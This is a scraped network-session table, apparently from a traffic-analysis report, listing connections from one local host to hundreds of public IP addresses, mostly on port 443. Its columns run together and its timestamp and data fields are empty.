                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28325192.168.2.2355606114.200.147.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28326192.168.2.2344936147.131.153.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28327192.168.2.2347966141.76.175.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28328192.168.2.2352248177.64.16.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28329192.168.2.235949495.61.168.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28330192.168.2.234919440.74.176.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28331192.168.2.23361589.88.40.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28332192.168.2.2349698168.88.5.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28333192.168.2.233769852.123.127.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28334192.168.2.235933896.228.0.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28335192.168.2.2344576205.207.180.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28336192.168.2.233834053.226.191.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28337192.168.2.2354462147.37.154.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28338192.168.2.2342112110.134.239.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28339192.168.2.2350944134.158.92.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28340192.168.2.2334198190.238.52.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28341192.168.2.235798053.183.23.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28342192.168.2.2350960143.40.118.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28343192.168.2.235981043.21.173.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28344192.168.2.233549466.42.103.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28345192.168.2.234562265.43.120.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28346192.168.2.2347722135.71.16.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28347192.168.2.234860897.81.64.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28348192.168.2.2335152123.125.103.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28349192.168.2.234688636.224.204.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28350192.168.2.2334056163.18.117.1978080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28351192.168.2.235614241.87.88.16337215
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28352192.168.2.2360256123.51.71.1278080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28353192.168.2.234911884.96.10.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28354192.168.2.235297638.246.245.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28355192.168.2.2339158159.175.53.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28356192.168.2.235232212.115.28.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28357192.168.2.2349786205.209.15.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28358192.168.2.236047457.73.197.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28359192.168.2.233547852.203.140.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28360192.168.2.235485672.157.27.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28361192.168.2.2351222198.187.91.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28362192.168.2.2335004108.186.172.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28363192.168.2.234059863.190.120.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28364192.168.2.2353626131.112.158.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28365192.168.2.2345562103.188.132.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28366192.168.2.235801096.226.189.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28367192.168.2.234446420.4.112.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28368192.168.2.235153044.250.225.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28369192.168.2.2358702130.27.206.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28370192.168.2.233865265.223.66.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28371192.168.2.234984294.220.49.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28372192.168.2.2358600173.108.72.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28373192.168.2.2338532194.29.45.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28374192.168.2.2349142138.139.128.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28375192.168.2.2345252217.151.116.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28376192.168.2.2344824101.50.203.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28377192.168.2.234105896.139.241.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28378192.168.2.2351800222.155.36.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28379192.168.2.233738859.212.131.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28380192.168.2.2339900155.196.247.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28381192.168.2.235311648.158.89.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28382192.168.2.2336330116.73.229.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28383192.168.2.2336340203.253.134.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28384192.168.2.235217078.64.91.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28385192.168.2.2336766187.13.9.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28386192.168.2.2334210128.75.86.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28387192.168.2.235392693.190.211.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28388192.168.2.2360598158.175.96.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28389192.168.2.2354324171.201.246.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28390192.168.2.233301246.95.202.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28391192.168.2.2342946204.182.24.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28392192.168.2.235417682.89.102.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28393192.168.2.234139854.10.32.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28394192.168.2.2356620157.169.51.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28395192.168.2.235575862.8.34.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28396192.168.2.233531073.216.247.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28397192.168.2.2358340197.195.81.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28398192.168.2.2347880174.155.229.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28399192.168.2.23445568.222.136.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28400192.168.2.235932439.251.234.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28401192.168.2.2335464196.94.138.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28402192.168.2.2338620130.8.189.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28403192.168.2.2351714178.92.190.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28404192.168.2.2358916149.162.79.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28405192.168.2.2353776141.231.178.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28406192.168.2.234685412.247.243.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28407192.168.2.2343142145.64.214.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28408192.168.2.2353394204.113.56.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28409192.168.2.2353364180.155.120.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28410192.168.2.233388041.205.117.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28411192.168.2.233535873.220.101.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28412192.168.2.2343610199.30.238.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28413192.168.2.2347288186.243.7.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28414192.168.2.2341116192.35.97.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28415192.168.2.233582034.48.96.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28416192.168.2.235636631.127.169.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28417192.168.2.2354856124.96.50.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28418192.168.2.233807649.145.143.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28419192.168.2.2359486164.121.236.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28420192.168.2.234340499.85.223.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28421192.168.2.2343002126.220.86.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28422192.168.2.235282094.9.19.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28423192.168.2.2342814212.181.232.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28424192.168.2.2359828204.39.251.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28425192.168.2.2344874184.243.67.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28426192.168.2.2341662174.216.133.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28427192.168.2.235937246.173.32.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28428192.168.2.2340942167.234.105.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28429192.168.2.2334650112.192.89.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28430192.168.2.2344728195.236.254.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28431192.168.2.2358708151.47.45.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28432192.168.2.234233634.53.203.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28433192.168.2.235421695.83.37.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28434192.168.2.2338372205.142.82.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28435192.168.2.235016698.162.9.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28436192.168.2.235770649.114.51.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28437192.168.2.2352042102.157.14.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28438192.168.2.2344482187.227.21.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28439192.168.2.233844618.184.208.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28440192.168.2.235596689.58.7.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28441192.168.2.2344372116.12.235.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28442192.168.2.2335276110.254.213.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28443192.168.2.234248690.10.88.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28444192.168.2.2340790104.168.125.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28445192.168.2.233728619.65.124.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28446192.168.2.234413470.183.174.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28447192.168.2.234321675.114.141.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28448192.168.2.2337012182.9.197.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28449192.168.2.2343510190.112.23.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28450192.168.2.2352496101.1.123.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28451192.168.2.2345042223.135.211.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28452192.168.2.2338858166.251.204.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28453192.168.2.2347598218.164.119.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28454192.168.2.2348844166.50.250.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28455192.168.2.2346142203.205.254.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28456192.168.2.2344146108.53.237.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28457192.168.2.234182674.84.123.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28458192.168.2.235519624.47.139.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28459192.168.2.2349882151.72.62.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28460192.168.2.2346464212.181.164.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28461192.168.2.2341646193.2.179.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28462192.168.2.2354384167.240.153.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28463192.168.2.2340970108.48.88.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28464192.168.2.233418680.240.78.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28465192.168.2.2360302101.41.141.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28466192.168.2.234481653.92.35.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28467192.168.2.2346036219.248.144.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28468192.168.2.234870818.154.224.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28469192.168.2.235932659.21.84.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28470192.168.2.2346304114.15.10.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28471192.168.2.2347378185.147.174.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28472192.168.2.2355790196.155.165.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28473192.168.2.2341706128.233.187.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28474192.168.2.233857432.120.121.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28475192.168.2.2354884157.67.165.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28476192.168.2.234848844.27.216.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28477192.168.2.2347152132.206.194.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28478192.168.2.235058241.241.132.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28479192.168.2.2333786199.214.177.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28480192.168.2.2334346150.0.191.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28481192.168.2.233318825.171.212.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28482192.168.2.233360623.226.231.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28483192.168.2.235470299.50.177.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28484192.168.2.2356038130.192.112.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28485192.168.2.2333478113.20.122.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28486192.168.2.2353844196.210.92.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28487192.168.2.233971267.94.190.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28488192.168.2.2348714131.75.122.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28489192.168.2.233553623.184.196.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28490192.168.2.2351424114.44.57.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28491192.168.2.23496844.50.17.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28492192.168.2.2343260155.87.76.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28493192.168.2.2342178132.175.145.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28494192.168.2.2354744211.141.195.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28495192.168.2.235725041.96.102.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28496192.168.2.235771659.182.2.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28497192.168.2.2360414129.189.83.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28498192.168.2.234468268.135.124.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28499192.168.2.2348776148.39.42.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28500192.168.2.2337510164.6.99.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28501192.168.2.2338224153.16.179.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28502192.168.2.2353716129.144.37.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28503192.168.2.2334952177.111.158.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28504192.168.2.2357468107.48.151.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28505192.168.2.2356616155.171.64.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28506192.168.2.235599081.181.102.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28507192.168.2.235801272.187.31.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28508192.168.2.2337584223.127.28.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28509192.168.2.2351576186.87.176.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28510192.168.2.234055038.28.10.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28511192.168.2.2344836187.200.39.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28512192.168.2.2347936107.75.252.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28513192.168.2.2344950128.105.131.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28514192.168.2.2345578158.101.68.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28515192.168.2.2339792152.239.142.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28516192.168.2.2340392133.137.103.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28517192.168.2.234529236.239.32.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28518192.168.2.2345148139.12.131.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28519192.168.2.235437812.174.230.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28520192.168.2.235185632.160.13.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28521192.168.2.2340952179.48.93.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28522192.168.2.23401448.232.34.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28523192.168.2.2340828148.34.7.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28524192.168.2.2339360204.124.206.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28525192.168.2.234928062.70.89.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28526192.168.2.234899471.119.121.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28527192.168.2.2343916221.19.247.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28528192.168.2.235825613.187.128.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28529192.168.2.2352030198.174.40.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28530192.168.2.234510081.235.74.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28531192.168.2.235853053.161.51.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28532192.168.2.235853213.21.62.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28533192.168.2.2353712186.179.33.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28534192.168.2.2342130209.142.58.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28535192.168.2.2343434169.6.245.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28536192.168.2.234157841.36.251.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28537192.168.2.2335400219.247.212.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28538192.168.2.234380241.105.186.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28539192.168.2.2350194195.238.30.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28540192.168.2.234146654.148.160.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28541192.168.2.2332990219.56.122.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28542192.168.2.233461035.178.201.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28543192.168.2.233569823.238.133.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28544192.168.2.235231824.196.72.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28545192.168.2.2350106161.190.199.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28546192.168.2.2340052177.49.40.11443
